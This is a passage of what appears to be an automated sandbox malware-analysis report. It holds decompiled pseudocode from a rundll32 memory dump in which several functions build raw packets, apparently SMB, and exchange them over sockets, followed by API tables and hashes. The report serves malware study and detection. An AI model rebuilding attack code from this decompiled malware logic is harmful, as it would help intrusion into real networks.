                                                                                                                                                              						 *(_t57 + 0x35) = _t50;
                                                                                                                                                              						 *(_t57 + 0x39) = _t50;
                                                                                                                                                              						 *((short*)(_t57 + 0x3d)) = _t50 + 1;
                                                                                                                                                              						_t24 = _t57 + 0x40; // 0x40
                                                                                                                                                              						 *((char*)(_t57 + 8)) = 0x2f;
                                                                                                                                                              						 *((short*)(_t57 + 0x24)) = 0xff0c;
                                                                                                                                                              						 *((short*)(_t57 + 0x3b)) = _t61;
                                                                                                                                                              						_t53 = memcpy(_t24, _a28, _v12);
                                                                                                                                                              						__imp__#19(_a4, _t57, _t70, 0);
                                                                                                                                                              						if(_t53 > 0) {
                                                                                                                                                              							_t71 = _v16;
                                                                                                                                                              							__imp__#16(_a4, _t71, 0xffff, 0);
                                                                                                                                                              							if(_t53 > 0 &&  *((intOrPtr*)(_t71 + 9)) == 0) {
                                                                                                                                                              								_v5 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}
















                                                                                                                                                              0x04e22f6f
                                                                                                                                                              0x04e22f7c
                                                                                                                                                              0x04e22f7e
                                                                                                                                                              0x04e22f83
                                                                                                                                                              0x04e22f89
                                                                                                                                                              0x04e22f8e
                                                                                                                                                              0x04e22f9c
                                                                                                                                                              0x04e22fa0
                                                                                                                                                              0x04e22fab
                                                                                                                                                              0x04e22fae
                                                                                                                                                              0x04e22fb3
                                                                                                                                                              0x04e22fb6
                                                                                                                                                              0x04e22fba
                                                                                                                                                              0x04e22fc0
                                                                                                                                                              0x04e22fc8
                                                                                                                                                              0x04e22fcf
                                                                                                                                                              0x04e22fd5
                                                                                                                                                              0x04e22fde
                                                                                                                                                              0x04e22fe2
                                                                                                                                                              0x04e22fe5
                                                                                                                                                              0x04e22fe9
                                                                                                                                                              0x04e22ff0
                                                                                                                                                              0x04e22ff5
                                                                                                                                                              0x04e22ff9
                                                                                                                                                              0x04e22ffd
                                                                                                                                                              0x04e23001
                                                                                                                                                              0x04e23007
                                                                                                                                                              0x04e2300b
                                                                                                                                                              0x04e2301b
                                                                                                                                                              0x04e23023
                                                                                                                                                              0x04e23025
                                                                                                                                                              0x04e23032
                                                                                                                                                              0x04e2303a
                                                                                                                                                              0x04e23041
                                                                                                                                                              0x04e23041
                                                                                                                                                              0x04e2303a
                                                                                                                                                              0x04e2304f
                                                                                                                                                              0x04e2304f
                                                                                                                                                              0x04e23061
                                                                                                                                                              0x04e23067
                                                                                                                                                              0x04e2306e

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04E22F73
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E22F7C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 04E22F97
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E22F9A
                                                                                                                                                              • htons.WS2_32(424D53FE), ref: 04E22FBA
                                                                                                                                                              • memcpy.MSVCRT ref: 04E2300B
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E2301B
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E23032
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E23048
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2304F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E2305A
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E23061
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 2433318192-3175316637
                                                                                                                                                              • Opcode ID: 2d5b3f4eae43877fc6bc396f3de91a67b558d0af412e9cd3b3976ad4d08c4797
                                                                                                                                                              • Instruction ID: 5812d342ce713cc017060878a074ad78653bf397b3e91071e5ea7385caa4f774
                                                                                                                                                              • Opcode Fuzzy Hash: 2d5b3f4eae43877fc6bc396f3de91a67b558d0af412e9cd3b3976ad4d08c4797
                                                                                                                                                              • Instruction Fuzzy Hash: 6F319E76900245ABEB109FA5DD88E9A7BB8FF48305F054055FE08EB245EB79D904CB24
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E232AF(intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                              				signed short _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				long _t30;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				int _t40;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				signed int _t50;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              
                                                                                                                                                              				_v16 = 0xbadf00d;
                                                                                                                                                              				_t27 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t27;
                                                                                                                                                              				if(_t27 != 0) {
                                                                                                                                                              					_t30 = (_a24 & 0x0000ffff) + 0x4d;
                                                                                                                                                              					_v8 = _t30;
                                                                                                                                                              					_t48 = HeapAlloc(GetProcessHeap(), 8, _t30);
                                                                                                                                                              					if(_t48 != 0) {
                                                                                                                                                              						_t50 = 9;
                                                                                                                                                              						_t37 = memcpy(_t48, _a8, _t50 << 2);
                                                                                                                                                              						__imp__#9(_v8 + 0xfffffffc);
                                                                                                                                                              						 *(_t48 + 2) = _t37;
                                                                                                                                                              						 *((short*)(_t48 + 0x22)) = _a12;
                                                                                                                                                              						 *((char*)(_t48 + 8)) = 0xa0;
                                                                                                                                                              						_t14 = _t48 + 0x24; // 0x24
                                                                                                                                                              						_t40 = memcpy(_t14, _a16, 0 << 2);
                                                                                                                                                              						_t17 = _t48 + 0x4d; // 0x4d
                                                                                                                                                              						asm("movsb");
                                                                                                                                                              						memcpy(_t17, _a20, _t40);
                                                                                                                                                              						_t43 = _v8 & 0x0000ffff;
                                                                                                                                                              						__imp__#19(_a4, _t48, _t43, 0, 0xa);
                                                                                                                                                              						if(_t43 > 0) {
                                                                                                                                                              							_t64 = _v12;
                                                                                                                                                              							__imp__#16(_a4, _t64, 0xffff, 0);
                                                                                                                                                              							if(_t43 > 0) {
                                                                                                                                                              								_v16 =  *((intOrPtr*)(_t64 + 9));
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t48);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}














                                                                                                                                                              0x04e232c4
                                                                                                                                                              0x04e232d4
                                                                                                                                                              0x04e232d6
                                                                                                                                                              0x04e232db
                                                                                                                                                              0x04e232e6
                                                                                                                                                              0x04e232ec
                                                                                                                                                              0x04e232f4
                                                                                                                                                              0x04e232f8
                                                                                                                                                              0x04e23306
                                                                                                                                                              0x04e2330d
                                                                                                                                                              0x04e2330f
                                                                                                                                                              0x04e23318
                                                                                                                                                              0x04e23322
                                                                                                                                                              0x04e2332b
                                                                                                                                                              0x04e2332f
                                                                                                                                                              0x04e23332
                                                                                                                                                              0x04e23338
                                                                                                                                                              0x04e2333c
                                                                                                                                                              0x04e2333d
                                                                                                                                                              0x04e23342
                                                                                                                                                              0x04e23350
                                                                                                                                                              0x04e23358
                                                                                                                                                              0x04e2335a
                                                                                                                                                              0x04e23368
                                                                                                                                                              0x04e23370
                                                                                                                                                              0x04e23375
                                                                                                                                                              0x04e23375
                                                                                                                                                              0x04e23370
                                                                                                                                                              0x04e23382
                                                                                                                                                              0x04e23382
                                                                                                                                                              0x04e23394
                                                                                                                                                              0x04e2339a
                                                                                                                                                              0x04e233a1

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 04E232CB
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E232D4
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,74654F20), ref: 04E232EF
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E232F2
                                                                                                                                                              • htons.WS2_32(?), ref: 04E2330F
                                                                                                                                                              • memcpy.MSVCRT ref: 04E2333D
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E23350
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E23368
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E2337B
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E23382
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E2338D
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E23394
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 2433318192-3175316637
                                                                                                                                                              • Opcode ID: 55436cfd3c6a17f2d0e1c328713ab971d79cd1ee9a0b55bbc9b0df457287dd6d
                                                                                                                                                              • Instruction ID: 93ac3c830b7377d21b19155cdf880e641c81f4fa8448dd9ff38881be5b6af503
                                                                                                                                                              • Opcode Fuzzy Hash: 55436cfd3c6a17f2d0e1c328713ab971d79cd1ee9a0b55bbc9b0df457287dd6d
                                                                                                                                                              • Instruction Fuzzy Hash: 4D318B7290021ABBEB109FA59D45EAF7BA8EF09311F148055FA00EB285EB79DD05CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E04E241E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, signed short _a12, intOrPtr* _a16) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				void _v36;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				signed int _t178;
                                                                                                                                                              				intOrPtr _t182;
                                                                                                                                                              				void* _t190;
                                                                                                                                                              				int _t193;
                                                                                                                                                              				void* _t196;
                                                                                                                                                              				intOrPtr _t211;
                                                                                                                                                              				intOrPtr _t212;
                                                                                                                                                              				intOrPtr _t214;
                                                                                                                                                              				intOrPtr _t215;
                                                                                                                                                              				intOrPtr _t218;
                                                                                                                                                              				intOrPtr _t219;
                                                                                                                                                              				intOrPtr _t220;
                                                                                                                                                              				void* _t227;
                                                                                                                                                              				void _t231;
                                                                                                                                                              				intOrPtr _t234;
                                                                                                                                                              				intOrPtr _t235;
                                                                                                                                                              				intOrPtr _t238;
                                                                                                                                                              				intOrPtr _t240;
                                                                                                                                                              				intOrPtr _t241;
                                                                                                                                                              				intOrPtr _t243;
                                                                                                                                                              				intOrPtr _t244;
                                                                                                                                                              				intOrPtr _t245;
                                                                                                                                                              				void* _t247;
                                                                                                                                                              				signed short _t249;
                                                                                                                                                              				signed int _t251;
                                                                                                                                                              				intOrPtr _t254;
                                                                                                                                                              				signed int _t255;
                                                                                                                                                              				signed short _t257;
                                                                                                                                                              				void* _t258;
                                                                                                                                                              				void* _t261;
                                                                                                                                                              				void* _t262;
                                                                                                                                                              				void* _t264;
                                                                                                                                                              				void* _t265;
                                                                                                                                                              				void* _t266;
                                                                                                                                                              				void* _t268;
                                                                                                                                                              				intOrPtr* _t277;
                                                                                                                                                              				void* _t278;
                                                                                                                                                              				intOrPtr* _t279;
                                                                                                                                                              				void* _t303;
                                                                                                                                                              				signed short _t305;
                                                                                                                                                              
                                                                                                                                                              				_t268 = __edx;
                                                                                                                                                              				_t247 = __ecx;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t303 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                              				_v12 = _t303;
                                                                                                                                                              				if(_t303 == 0) {
                                                                                                                                                              					L36:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t277 = _a16;
                                                                                                                                                              				 *((char*)(_t303 + 2)) = 1;
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				asm("adc edx, [ebx+0x14]");
                                                                                                                                                              				if(E04E240E3( *_t277, _t247, _a4,  *_a8, ( *( *_t277 + 0x5d) & 0x000000ff) +  *((intOrPtr*)( *_t277 + 0x10)), _t268, _t303, 2) == 0) {
                                                                                                                                                              					L35:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t303);
                                                                                                                                                              					goto L36;
                                                                                                                                                              				}
                                                                                                                                                              				_v16 = _v16 & 0x00000000;
                                                                                                                                                              				if(E04E23D0D(_t247, _t268, _a4, _a8, _a12,  *((intOrPtr*)( *_t277 + 0x10)),  *((intOrPtr*)( *_t277 + 0x14)),  &_v16, 0x100, _t277) == 0) {
                                                                                                                                                              					goto L35;
                                                                                                                                                              				}
                                                                                                                                                              				_t178 =  *( *_t277 + 0x5c) & 0x000000ff;
                                                                                                                                                              				_t248 = _v16;
                                                                                                                                                              				_t231 =  *(_t248 + _t178);
                                                                                                                                                              				_v24 =  *((intOrPtr*)(_t178 + _t248 + 4));
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                              				_t182 =  *_t277;
                                                                                                                                                              				if( *((char*)(_t182 + 0x66)) == 0) {
                                                                                                                                                              					_t249 =  *(_t182 + 0x64) & 0x000000ff;
                                                                                                                                                              					_a12 = _t249;
                                                                                                                                                              					if(0 >= _t249) {
                                                                                                                                                              						L40:
                                                                                                                                                              						if(E04E240E3(_t182, _a8, _a4,  *_a8, _t231, _v24, _t303, _a12) != 0) {
                                                                                                                                                              							_v5 = 1;
                                                                                                                                                              						}
                                                                                                                                                              						goto L35;
                                                                                                                                                              					}
                                                                                                                                                              					_t278 = 0;
                                                                                                                                                              					_t251 = _t249 & 0x0000ffff;
                                                                                                                                                              					do {
                                                                                                                                                              						 *(_t278 + _t303 + 1) =  !( *(_t278 +  *((intOrPtr*)(_t182 + 0x60))));
                                                                                                                                                              						_t278 = _t278 + 1;
                                                                                                                                                              						_t251 = _t251 - 1;
                                                                                                                                                              					} while (_t251 != 0);
                                                                                                                                                              					goto L40;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t184 =  *((intOrPtr*)(_t182 + 0x65));
                                                                                                                                                              					if( *((intOrPtr*)(_t182 + 0x65)) != 0) {
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						asm("adc edx, [ebp-0x14]");
                                                                                                                                                              						_t248 =  &_v16;
                                                                                                                                                              						if(E04E23D0D( &_v16, _t268, _a4, _a8, _a12, (_t184 & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                              							_t231 = 0;
                                                                                                                                                              							_v24 = 0;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t227 = _v16;
                                                                                                                                                              							_t248 =  *(_t227 + 4);
                                                                                                                                                              							_t231 =  *_t227;
                                                                                                                                                              							_v24 =  *(_t227 + 4);
                                                                                                                                                              							HeapFree(GetProcessHeap(), 8, _t227);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					if(_t231 != 0 || _v24 != _t231) {
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						asm("adc edx, [ebp-0x14]");
                                                                                                                                                              						if(E04E23D0D(_t248, _t268, _a4, _a8, _a12, ( *( *_t277 + 0x66) & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                              							goto L35;
                                                                                                                                                              						}
                                                                                                                                                              						_t190 = _v16;
                                                                                                                                                              						_t233 =  *_t190;
                                                                                                                                                              						_v36 =  *_t190;
                                                                                                                                                              						_v32 =  *((intOrPtr*)(_t190 + 4));
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t190);
                                                                                                                                                              						_t253 =  *_t277;
                                                                                                                                                              						_t193 = 0x100;
                                                                                                                                                              						if(0 ==  *((intOrPtr*)( *_t277))) {
                                                                                                                                                              							_t193 = 0x200;
                                                                                                                                                              						}
                                                                                                                                                              						if(E04E23D0D(_t253, 0, _a4, _a8, _a12, _t233, _v32,  &_v16, _t193, _t277) == 0) {
                                                                                                                                                              							goto L35;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t254 =  *_t277;
                                                                                                                                                              							_t196 = _v16;
                                                                                                                                                              							_t255 =  *(_t254 + 0x68) & 0x000000ff;
                                                                                                                                                              							_t234 =  *((intOrPtr*)(_t196 + _t255));
                                                                                                                                                              							_a12 =  *(_t196 + ( *(_t254 + 0x67) & 0x000000ff));
                                                                                                                                                              							_v28 = _t234;
                                                                                                                                                              							_v24 =  *((intOrPtr*)(_t255 + _t196 + 4));
                                                                                                                                                              							HeapFree(GetProcessHeap(), 8, _t196);
                                                                                                                                                              							memset(_t303, 0, 0x100);
                                                                                                                                                              							if(_a12 == 0) {
                                                                                                                                                              								goto L35;
                                                                                                                                                              							}
                                                                                                                                                              							_t279 =  *_t277;
                                                                                                                                                              							_t257 = _a12;
                                                                                                                                                              							_v16 = _t279;
                                                                                                                                                              							if(1 !=  *_t279) {
                                                                                                                                                              								_t258 = _t257 - 1;
                                                                                                                                                              								if(_t258 == 0) {
                                                                                                                                                              									_a12 = 1;
                                                                                                                                                              									_t235 = _t234 + 0x10;
                                                                                                                                                              									asm("adc eax, edx");
                                                                                                                                                              									 *(_t303 + 5) = _v24;
                                                                                                                                                              									_push(0x1c);
                                                                                                                                                              									L30:
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 1)) = _t235;
                                                                                                                                                              									L31:
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_pop(_t305);
                                                                                                                                                              									_t281 = _a8;
                                                                                                                                                              									_t260 = _a12;
                                                                                                                                                              									 *((_t305 & 0x0000ffff) + _v12 + 1 + 4) = _a12;
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									asm("adc edx, [ebp-0x1c]");
                                                                                                                                                              									if(E04E240E3(_v16, _a12, _a4,  *_a8, ( *(_v16 + 0x67) & 0x000000ff) + _v36, 0, (_t305 & 0x0000ffff) + _v12 + 1 + 3, 4) != 0 && E04E240E3( *_a16, _t260, _a4,  *_t281, _v28, _v24, _v12, _t305) != 0) {
                                                                                                                                                              										_v5 = 1;
                                                                                                                                                              									}
                                                                                                                                                              									_t303 = _v12;
                                                                                                                                                              									goto L35;
                                                                                                                                                              								}
                                                                                                                                                              								_t261 = _t258 - 1;
                                                                                                                                                              								_t211 = _t234;
                                                                                                                                                              								if(_t261 == 0) {
                                                                                                                                                              									_t262 = _v24;
                                                                                                                                                              									_t212 = _t211 + 0x20;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 1)) = _t212;
                                                                                                                                                              									asm("adc ecx, edx");
                                                                                                                                                              									 *(_t303 + 5) = _t262;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 0x11)) = _t212 + 0xc;
                                                                                                                                                              									 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                              									asm("adc ecx, edx");
                                                                                                                                                              									 *(_t303 + 0x15) = _t262;
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_a12 = 2;
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_push(0x3c);
                                                                                                                                                              								} else {
                                                                                                                                                              									_t264 = _v24;
                                                                                                                                                              									if(_t261 == 1) {
                                                                                                                                                              										_t214 = _t211 + 0x30;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 1)) = _t214;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 5) = _t264;
                                                                                                                                                              										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                              										_t215 = _t214 + 0xc;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 0x11)) = _t215;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 0x15) = _t264;
                                                                                                                                                              										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 0x21)) = _t215 + 0x10;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 0x25) = _t264;
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										_a12 = 3;
                                                                                                                                                              										_push(0x58);
                                                                                                                                                              									} else {
                                                                                                                                                              										_t218 = _t211 + 0x40;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 1)) = _t218;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 5) = _t264;
                                                                                                                                                              										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                              										_t219 = _t218 + 0xc;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 0x11)) = _t219;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 0x15) = _t264;
                                                                                                                                                              										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                              										_t220 = _t219 + 0x10;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 0x21)) = _t220;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 0x25) = _t264;
                                                                                                                                                              										 *((char*)(_t303 + 0x39)) = 7;
                                                                                                                                                              										 *((intOrPtr*)(_t303 + 0x31)) = _t220 + 0xc;
                                                                                                                                                              										asm("adc ecx, edx");
                                                                                                                                                              										 *(_t303 + 0x35) = _t264;
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										asm("movsd");
                                                                                                                                                              										_a12 = 4;
                                                                                                                                                              										_push(0x74);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L31;
                                                                                                                                                              							}
                                                                                                                                                              							_t265 = _t257 - 1;
                                                                                                                                                              							if(_t265 == 0) {
                                                                                                                                                              								_a12 = 1;
                                                                                                                                                              								_t235 = _t234 + 8;
                                                                                                                                                              								_push(0x14);
                                                                                                                                                              								goto L30;
                                                                                                                                                              							}
                                                                                                                                                              							_t266 = _t265 - 1;
                                                                                                                                                              							if(_t266 == 0) {
                                                                                                                                                              								_t238 = _t234 + 0x10;
                                                                                                                                                              								 *((intOrPtr*)(_t303 + 1)) = _t238;
                                                                                                                                                              								 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                              								 *((intOrPtr*)(_t303 + 9)) = _t238 + 0xc;
                                                                                                                                                              								asm("movsd");
                                                                                                                                                              								asm("movsd");
                                                                                                                                                              								asm("movsd");
                                                                                                                                                              								_a12 = 2;
                                                                                                                                                              								asm("movsd");
                                                                                                                                                              								_push(0x2c);
                                                                                                                                                              							} else {
                                                                                                                                                              								if(_t266 == 1) {
                                                                                                                                                              									_t240 = _t234 + 0x18;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 1)) = _t240;
                                                                                                                                                              									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                              									_t241 = _t240 + 0xc;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 9)) = _t241;
                                                                                                                                                              									 *(_t303 + 0x15) = 7;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 0x11)) = _t241 + 0x10;
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_a12 = 3;
                                                                                                                                                              									_push(0x40);
                                                                                                                                                              								} else {
                                                                                                                                                              									_t243 = _t234 + 0x20;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 1)) = _t243;
                                                                                                                                                              									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                              									_t244 = _t243 + 0xc;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 9)) = _t244;
                                                                                                                                                              									 *(_t303 + 0x15) = 7;
                                                                                                                                                              									_t245 = _t244 + 0x10;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 0x11)) = _t245;
                                                                                                                                                              									 *((char*)(_t303 + 0x1d)) = 7;
                                                                                                                                                              									 *((intOrPtr*)(_t303 + 0x19)) = _t245 + 0xc;
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									_a12 = 4;
                                                                                                                                                              									_push(0x54);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							goto L31;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L35;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}



















































                                                                                                                                                              0x04e241e9
                                                                                                                                                              0x04e241e9
                                                                                                                                                              0x04e241f9
                                                                                                                                                              0x04e2420a
                                                                                                                                                              0x04e2420c
                                                                                                                                                              0x04e24211
                                                                                                                                                              0x04e24679
                                                                                                                                                              0x04e24680
                                                                                                                                                              0x04e24680
                                                                                                                                                              0x04e24217
                                                                                                                                                              0x04e2421c
                                                                                                                                                              0x04e24224
                                                                                                                                                              0x04e2422a
                                                                                                                                                              0x04e2423f
                                                                                                                                                              0x04e24669
                                                                                                                                                              0x04e24673
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24673
                                                                                                                                                              0x04e24245
                                                                                                                                                              0x04e2426b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24273
                                                                                                                                                              0x04e24277
                                                                                                                                                              0x04e2427a
                                                                                                                                                              0x04e24284
                                                                                                                                                              0x04e2428e
                                                                                                                                                              0x04e24294
                                                                                                                                                              0x04e2429a
                                                                                                                                                              0x04e24683
                                                                                                                                                              0x04e24689
                                                                                                                                                              0x04e2468f
                                                                                                                                                              0x04e246a6
                                                                                                                                                              0x04e246bf
                                                                                                                                                              0x04e246c1
                                                                                                                                                              0x04e246c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e246bf
                                                                                                                                                              0x04e24691
                                                                                                                                                              0x04e24693
                                                                                                                                                              0x04e24696
                                                                                                                                                              0x04e2469e
                                                                                                                                                              0x04e246a2
                                                                                                                                                              0x04e246a3
                                                                                                                                                              0x04e246a3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e242a0
                                                                                                                                                              0x04e242a0
                                                                                                                                                              0x04e242a5
                                                                                                                                                              0x04e242ad
                                                                                                                                                              0x04e242b0
                                                                                                                                                              0x04e242b3
                                                                                                                                                              0x04e242c9
                                                                                                                                                              0x04e242e8
                                                                                                                                                              0x04e242ea
                                                                                                                                                              0x04e242cb
